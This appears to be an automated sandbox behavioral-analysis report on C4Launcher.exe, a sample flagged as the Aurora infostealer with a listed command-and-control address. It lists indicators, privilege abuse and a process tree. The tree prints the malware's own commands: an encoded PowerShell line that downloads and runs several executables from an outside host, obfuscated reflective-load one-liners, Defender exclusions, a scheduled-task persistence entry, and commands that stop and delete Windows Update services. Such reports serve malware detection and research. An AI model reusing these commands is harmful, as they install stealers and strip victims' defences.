Analysis
-
max time kernel
150s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
03-04-2023 18:15
Static task
static1
Behavioral task
behavioral1
Sample
C4Launcher.exe
Resource
win7-20230220-en
General
-
Target
C4Launcher.exe
-
Size
855KB
-
MD5
18014fc649434b87bc636b177c3681fa
-
SHA1
7b021861b19aa3f9d8ee155b0b7b7393e1e09b61
-
SHA256
5602954abc2dc945783dcba2d749d801f88f790fca8b3eeef99ca493a2a2763b
-
SHA512
46535652f7559da293c5e9e5c03d48d8417dea6e4d1012a67bae1b0da45c6c5ad76ea0d17968b87c6fbd3963b7708640136f8477ff69a867a3aeb4fd3b0dcd38
-
SSDEEP
3072:NBAN1gjFgmYSg25SYDGFHUNR1ZvhfKEaO7j9fDgjMKs:4egmLgmCeNXfPJDQMKs
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
SmartDefRun.exepowershell.EXEdescription pid process target process PID 1692 created 1248 1692 SmartDefRun.exe Explorer.EXE PID 1692 created 1248 1692 SmartDefRun.exe Explorer.EXE PID 1692 created 1248 1692 SmartDefRun.exe Explorer.EXE PID 1692 created 1248 1692 SmartDefRun.exe Explorer.EXE PID 1332 created 420 1332 powershell.EXE winlogon.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 2004 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
Processes:
C4Loader.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exepid process 888 C4Loader.exe 1660 new2.exe 1048 SysApp.exe 1692 SmartDefRun.exe 960 fodhelper.exe -
Loads dropped DLL 7 IoCs
Processes:
powershell.exeWMIC.exepid process 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 WMIC.exe 2004 WMIC.exe 2004 WMIC.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 6 IoCs
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
C4Launcher.exeSmartDefRun.exepowershell.EXEdescription pid process target process PID 2000 set thread context of 1060 2000 C4Launcher.exe InstallUtil.exe PID 1692 set thread context of 988 1692 SmartDefRun.exe dialer.exe PID 1332 set thread context of 632 1332 powershell.EXE dllhost.exe -
Drops file in Program Files directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1556 sc.exe 272 sc.exe 1740 sc.exe 524 sc.exe 692 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e055ff4e5866d901 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWMIC.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exepowershell.EXEpowershell.EXEdllhost.exepid process 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 WMIC.exe 2004 WMIC.exe 2004 WMIC.exe 2004 WMIC.exe 1692 SmartDefRun.exe 1692 SmartDefRun.exe 1816 powershell.exe 1692 SmartDefRun.exe 1692 SmartDefRun.exe 1692 SmartDefRun.exe 1692 SmartDefRun.exe 1712 powershell.exe 1692 SmartDefRun.exe 1692 SmartDefRun.exe 1048 SysApp.exe 1048 SysApp.exe 1048 SysApp.exe 1048 SysApp.exe 1048 SysApp.exe 1332 powershell.EXE 884 powershell.EXE 1332 powershell.EXE 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exewmic.exepowershell.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2004 powershell.exe Token: SeIncreaseQuotaPrivilege 1956 wmic.exe Token: SeSecurityPrivilege 1956 wmic.exe Token: SeTakeOwnershipPrivilege 1956 wmic.exe Token: SeLoadDriverPrivilege 1956 wmic.exe Token: SeSystemProfilePrivilege 1956 wmic.exe Token: SeSystemtimePrivilege 1956 wmic.exe Token: SeProfSingleProcessPrivilege 1956 wmic.exe Token: SeIncBasePriorityPrivilege 1956 wmic.exe Token: SeCreatePagefilePrivilege 1956 wmic.exe Token: SeBackupPrivilege 1956 wmic.exe Token: SeRestorePrivilege 1956 wmic.exe Token: SeShutdownPrivilege 1956 wmic.exe Token: SeDebugPrivilege 1956 wmic.exe Token: SeSystemEnvironmentPrivilege 1956 wmic.exe Token: SeRemoteShutdownPrivilege 1956 wmic.exe Token: SeUndockPrivilege 1956 wmic.exe Token: SeManageVolumePrivilege 1956 wmic.exe Token: 33 1956 wmic.exe Token: 34 1956 wmic.exe Token: 35 1956 wmic.exe Token: SeIncreaseQuotaPrivilege 1956 wmic.exe Token: SeSecurityPrivilege 1956 wmic.exe Token: SeTakeOwnershipPrivilege 1956 wmic.exe Token: SeLoadDriverPrivilege 1956 wmic.exe Token: SeSystemProfilePrivilege 1956 wmic.exe Token: SeSystemtimePrivilege 1956 wmic.exe Token: SeProfSingleProcessPrivilege 1956 wmic.exe Token: SeIncBasePriorityPrivilege 1956 wmic.exe Token: SeCreatePagefilePrivilege 1956 wmic.exe Token: SeBackupPrivilege 1956 wmic.exe Token: SeRestorePrivilege 1956 wmic.exe Token: SeShutdownPrivilege 1956 wmic.exe Token: SeDebugPrivilege 1956 wmic.exe Token: SeSystemEnvironmentPrivilege 1956 wmic.exe Token: SeRemoteShutdownPrivilege 1956 wmic.exe Token: SeUndockPrivilege 1956 wmic.exe Token: SeManageVolumePrivilege 1956 wmic.exe Token: 33 1956 wmic.exe Token: 34 1956 wmic.exe Token: 35 1956 wmic.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 2016 WMIC.exe Token: SeSecurityPrivilege 2016 WMIC.exe Token: SeTakeOwnershipPrivilege 2016 WMIC.exe Token: SeLoadDriverPrivilege 2016 WMIC.exe Token: SeSystemProfilePrivilege 2016 WMIC.exe Token: SeSystemtimePrivilege 2016 WMIC.exe Token: SeProfSingleProcessPrivilege 2016 WMIC.exe Token: SeIncBasePriorityPrivilege 2016 WMIC.exe Token: SeCreatePagefilePrivilege 2016 WMIC.exe Token: SeBackupPrivilege 2016 WMIC.exe Token: SeRestorePrivilege 2016 WMIC.exe Token: SeShutdownPrivilege 2016 WMIC.exe Token: SeDebugPrivilege 2016 WMIC.exe Token: SeSystemEnvironmentPrivilege 2016 WMIC.exe Token: SeRemoteShutdownPrivilege 2016 WMIC.exe Token: SeUndockPrivilege 2016 WMIC.exe Token: SeManageVolumePrivilege 2016 WMIC.exe Token: 33 2016 WMIC.exe Token: 34 2016 WMIC.exe Token: 35 2016 WMIC.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeIncreaseQuotaPrivilege 2016 WMIC.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
svchost.exepid process 864 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4Launcher.exeInstallUtil.exepowershell.exeWMIC.exenew2.execmd.execmd.exedescription pid process target process PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 2000 wrote to memory of 1060 2000 C4Launcher.exe InstallUtil.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 1060 wrote to memory of 2004 1060 InstallUtil.exe powershell.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 888 2004 powershell.exe C4Loader.exe PID 2004 wrote to memory of 1660 2004 powershell.exe new2.exe PID 2004 wrote to memory of 1660 2004 powershell.exe new2.exe PID 2004 wrote to memory of 1660 2004 powershell.exe new2.exe PID 2004 wrote to memory of 1660 2004 powershell.exe new2.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1048 2004 WMIC.exe SysApp.exe PID 2004 wrote to memory of 1692 2004 WMIC.exe SmartDefRun.exe PID 2004 wrote to memory of 1692 2004 WMIC.exe SmartDefRun.exe PID 2004 wrote to memory of 1692 2004 WMIC.exe SmartDefRun.exe PID 2004 wrote to memory of 1692 2004 WMIC.exe SmartDefRun.exe PID 1660 wrote to memory of 1956 1660 new2.exe wmic.exe PID 1660 wrote to memory of 1956 1660 new2.exe wmic.exe PID 1660 wrote to memory of 1956 1660 new2.exe wmic.exe PID 1660 wrote to memory of 1644 1660 new2.exe cmd.exe PID 1660 wrote to memory of 1644 1660 new2.exe cmd.exe PID 1660 wrote to memory of 1644 1660 new2.exe cmd.exe PID 1644 wrote to memory of 2016 1644 cmd.exe WMIC.exe PID 1644 wrote to memory of 2016 1644 cmd.exe WMIC.exe PID 1644 wrote to memory of 2016 1644 cmd.exe WMIC.exe PID 1584 wrote to memory of 1740 1584 cmd.exe sc.exe PID 1584 wrote to memory of 1740 1584 cmd.exe sc.exe PID 1584 wrote to memory of 1740 1584 cmd.exe sc.exe PID 1584 wrote to memory of 524 1584 cmd.exe sc.exe PID 1584 wrote to memory of 524 1584 cmd.exe sc.exe PID 1584 wrote to memory of 524 1584 cmd.exe sc.exe PID 1584 wrote to memory of 692 1584 cmd.exe sc.exe PID 1584 wrote to memory of 692 1584 cmd.exe sc.exe PID 1584 wrote to memory of 692 1584 cmd.exe sc.exe PID 1584 wrote to memory of 1556 1584 cmd.exe sc.exe PID 1584 wrote to memory of 1556 1584 cmd.exe sc.exe PID 1584 wrote to memory of 1556 1584 cmd.exe sc.exe PID 1584 wrote to memory of 272 1584 cmd.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
PID:864 -
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:1820
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6453AB17-4398-4FE9-9906-4D4D55F51DD1} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:1216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+'ale'+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1332
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {09689AFA-8D69-468E-9C8E-E9269FDC274E} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]3⤵PID:1960
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe4⤵
- Executes dropped EXE
PID:960
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1084
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:804
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:940
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:1000
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:824
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:764
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e5323e94-f8c5-4d6d-8dc7-6a4d4dbe299e}2⤵
- Suspicious behavior: EnumeratesProcesses
PID:632
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe"C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵PID:1976
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1048 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"6⤵
- Creates scheduled task(s)
PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1692
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1740
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:524
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:692
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1556
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:272
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:576
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1544
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:696
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1340
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:744
-
-
-
